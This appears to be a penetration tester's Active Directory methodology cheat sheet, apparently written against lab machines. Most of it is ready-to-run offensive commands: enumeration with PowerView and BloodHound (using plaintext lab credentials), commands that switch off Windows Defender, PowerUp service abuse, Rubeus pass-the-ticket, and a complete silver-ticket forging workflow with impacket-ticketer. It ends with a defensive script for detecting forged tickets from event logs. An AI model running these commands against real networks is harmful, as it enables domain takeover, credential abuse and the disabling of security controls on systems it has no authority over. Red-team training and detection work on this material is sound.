# Methodology

## Enumerating AD Environment

### Listing Shares on Windows

```
# List the shares exposed by a host
net view \\Computername.abc.corp

# List the contents of a share (SHARENAME is a placeholder for the share to inspect)
dir \\computer-name.abc.corp\SHARENAME
```

### Impacket-SmbServer to Host Files

We can also use impacket-smbserver to host files, and run tools directly from this share on the target.

```
impacket-smbserver -smb2support -username test -password test share $(pwd)

# Without a password
impacket-smbserver -smb2support share $(pwd)
```

Then, on the target Windows machine, connect to this share and run the tools from it.

```
net use \\IP_add_of_kali\share
```

### Turn AV off

```
# Run in CMD
"C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all 
### In PowerShell
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true 
```

## PowerView Enumerating Basic Stuff

#### Enumerate AD Users

Get-DomainUser on its own prints a lot of detail, so use the command below to show only the usernames:

```
Get-DomainUser | select -ExpandProperty samaccountname
```

#### Enumerating AD Computers

This command will get all of the computer names in the Domain.

```
Get-DomainComputer | select -ExpandProperty dnshostname
```

#### Enumerating Domain Admins Group

```
Get-DomainGroup -Identity "Domain Admins"
```

#### Enumerating Domain Admins Group Members

```
Get-DomainGroupMember -Identity "Domain Admins"
```

#### Enumerating Enterprise Admins Group Members

```
Get-DomainGroupMember -Identity "Enterprise Admins"
# Enterprise Admins exists only in the forest root domain, so query that domain explicitly:
Get-DomainGroupMember -Identity "Enterprise Admins" -Domain moneycorp.local
```

### PowerView Enumerating Advanced

#### Enumerating ACL's

```
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "USERNAME HERE"}

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "GROUP NAME HERE"}
```

#### Enumerating Organizational Unit (OU)

```
Get-DomainOU | select -ExpandProperty name
# List all the computers in the DevOps OU:
(Get-DomainOU -Identity DevOps).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name
```

## Tools and Commands

### Powerup.ps1

To invoke an abuse function with a username of your choosing, use the command below.

```
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'DOMAIN\USERNAME' -Verbose
```

### Bloodhound-python

With a valid set of credentials we can enumerate the domain with BloodHound; on Kali Linux the bloodhound-python collector script does the collection:

```
bloodhound-python --dns-tcp -ns 10.10.179.143 -d klendathu.vl -u 'zim' -p 'football22' -c all
```

### Rubeus Commands

```
# Request a TGT with the NT hash and inject it into memory
Rubeus.exe asktgt /user:Username /rc4:HASH /domain:abc.local /ptt

# If you have the password instead of the hash
Rubeus.exe asktgt /user:Username /password:password /domain:abc.local /ptt
```

### Runas Command

```
runas /user:domain\username "C:\Windows\System32\cmd.exe"
```

### PS-Session and Cred Object

```
$SecPassword = ConvertTo-SecureString 'password' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('domain\user', $SecPassword)

# Use the credential object built above
Enter-PSSession -ComputerName abc.corp.local -Credential $Cred
```

## Silver Ticket Attack

In a silver ticket attack, the attacker forges a valid TGS (Ticket Granting Service ticket) for a specific service and then uses that TGS to access the service.

For this attack we need the NTLM hash of the service account. It can be computed with online tools or with the Python snippet below:

```python
# Compute the NT hash (MD4 over the UTF-16LE encoded password) of "test1234"
import hashlib

# Note: on Python builds linked against OpenSSL 3, MD4 lives in the legacy provider
# and hashlib.new('md4') raises ValueError unless that provider is enabled.
nt_hash = hashlib.new('md4', "test1234".encode('utf-16le')).hexdigest()
print(nt_hash)
```

To obtain the domain SID we can use:

```
# Print the domain SID
impacket-lookupsid domain/username:password@10.10.231.85
```

Now that we have both the NTLM hash and the domain SID we can forge the silver ticket; for this I like to use **impacket-ticketer**:

```
impacket-ticketer -spn MSSQLSvc/srv1.klendathu.vl -domain klendathu.vl -domain-sid S-1-5-21-641890747-1618203462-755025521 -nthash E2F156A20FA3AC2B16768F8ADD53D72C administrator
```

This creates an administrator.ccache file.

```
# Export the ticket so the Impacket tools pick it up
export KRB5CCNAME=administrator.ccache

# Then use this ticket to access any service, e.g. MSSQL
impacket-mssqlclient -k -no-pass <domain name or subdomain>

# e.g.
impacket-mssqlclient -k -no-pass SRV1.Klendathu.vl
```
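Because a forged TGS is presented straight to the service and never requested from the KDC, the DC records no 4769 (Kerberos service ticket requested) for it while the service host still records a 4624 Kerberos network logon. The script below is an added defensive example, not part of the original notes: it joins constructed sample DC and host events (not real logs) and flags host logons that no DC ticket grant explains, using the srv1.klendathu.vl host from the walkthrough above.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs). 4769 = TGS requested, logged on the DC;
# 4624 = account logon, logged on the service host.
DC_EVENTS = [
    {"id": 4769, "time": "2024-05-01T10:00:05", "user": "alice",
     "service": "MSSQLSvc/srv1.klendathu.vl:1433", "etype": "0x12"},
    {"id": 4769, "time": "2024-05-01T10:02:00", "user": "bob",
     "service": "cifs/srv1.klendathu.vl", "etype": "0x12"},
]
HOST_EVENTS = [
    {"id": 4624, "time": "2024-05-01T10:00:07", "user": "alice",
     "host": "srv1.klendathu.vl", "logon_type": 3, "auth": "Kerberos"},
    {"id": 4624, "time": "2024-05-01T10:02:03", "user": "bob",
     "host": "srv1.klendathu.vl", "logon_type": 3, "auth": "Kerberos"},
    # A forged ticket: the host accepts it, but the DC never issued it.
    {"id": 4624, "time": "2024-05-01T10:15:00", "user": "administrator",
     "host": "srv1.klendathu.vl", "logon_type": 3, "auth": "Kerberos"},
]


def spn_host(spn):
    """Reduce an SPN such as MSSQLSvc/srv1.klendathu.vl:1433 to its host name."""
    return spn.split("/", 1)[-1].split(":", 1)[0].lower()


def find_unissued_kerberos_logons(dc_events, host_events, window=timedelta(minutes=10)):
    """Return Kerberos network logons on a host for which the DC logged no 4769
    for the same user and host within `window` before the logon.
    A silver ticket produces exactly this pattern, because the forged TGS is
    presented straight to the service and never requested from the KDC."""
    grants = [(e["user"].lower(), spn_host(e["service"]), datetime.fromisoformat(e["time"]))
              for e in dc_events if e["id"] == 4769]
    suspicious = []
    for logon in host_events:
        if logon["id"] != 4624 or logon["logon_type"] != 3 or logon["auth"] != "Kerberos":
            continue
        when = datetime.fromisoformat(logon["time"])
        user, host = logon["user"].lower(), logon["host"].lower()
        explained = any(u == user and h == host and when - window <= t <= when
                        for u, h, t in grants)
        if not explained:
            suspicious.append(logon)
    return suspicious


if __name__ == "__main__":
    for hit in find_unissued_kerberos_logons(DC_EVENTS, HOST_EVENTS):
        print(f"{hit['time']} {hit['user']}@{hit['host']}: Kerberos logon with no matching TGS grant on the DC")
```

In production the join keys map to the Account Name and Service Name fields of 4769 and the Account Name, Logon Type and Authentication Package fields of 4624; Kerberos service ticket auditing on the DCs and logon auditing on the hosts must both be enabled for the correlation to work.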
